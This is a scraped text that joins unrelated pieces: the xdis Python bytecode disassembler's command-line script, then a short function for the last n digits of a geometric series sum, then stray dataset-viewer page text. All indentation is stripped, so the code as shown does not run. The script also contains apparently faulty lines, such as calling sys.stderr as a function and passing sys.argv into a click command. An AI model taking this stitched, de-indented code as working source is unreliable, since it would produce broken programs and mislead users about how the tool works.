# Copyright (c) 2015-2019 by Rocky Bernstein <rb@dustyfeet.com>
#
# Note: we can't start with #! because setup.py bdist_wheel will look for that
# and change that into something that's not portable. Thank you, Python!
#
#
from __future__ import print_function
import sys, os
import click
import os.path as osp
from xdis.version import VERSION
from xdis import PYTHON_VERSION
from xdis.main import disassemble_file
program, ext = os.path.splitext(os.path.basename(__file__))
PATTERNS = ('*.pyc', '*.pyo')
@click.command()
@click.option("--asm/--noasm", default=False,
help='Produce output suitable for the xasm assembler')
@click.option("--show-bytes/--noshow-bytes", default=False,
help='include bytecode bytes in output')
@click.version_option(version=VERSION)
@click.option("--header/--no-header", default=False,
help='Show only the module header information')
@click.argument('files', nargs=-1, type=click.Path(readable=True), required=True)
def main(asm, show_bytes, header, files):
"""Disassembles a Python bytecode file.
We handle bytecode for virtually every release of Python and some releases of PyPy.
The version of Python in the bytecode doesn't have to be the same version as
the Python interpreter used to run this program. For example, you can disassemble Python 3.6.1
bytecode from Python 2.7.13 and vice versa.
"""
Usage_short = """usage:
%s [--asm] -i FILE...
%s --version
Type -h for for full help.""" % (program, program)
if not (2.5 <= PYTHON_VERSION <= 3.8):
sys.stderr(print("This works on Python version 2.5..3.8; have %s" % PYTHON_VERSION))
if not len(files):
sys.stderr.write("No file(s) given..\n")
print(Usage_short, file=sys.stderr)
sys.exit(1)
for path in files:
# Some sanity checks
if not osp.exists(path):
sys.stderr.write("File name: '%s' doesn't exist\n" % path)
continue
elif not osp.isfile(path):
sys.stderr.write("File name: '%s' isn't a file\n" % path)
continue
elif osp.getsize(path) < 50:
sys.stderr.write("File name: '%s (%d bytes)' is too short to be a valid pyc file\n" % (path, osp.getsize(path)))
continue
disassemble_file(path, sys.stdout, asm, header, show_bytes)
return
if __name__ == '__main__':
main(sys.argv[1:])
|
def n_last_char(a,b,n):
if (a == 1):
s = b + 1
else: s = (pow(a,b+1) - 1)//(a-1)
s %= pow(10,n)
res = str(s)
while (len(res)<n):
res = '0' + res
return res
# print(n_last_char(1,1,4))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.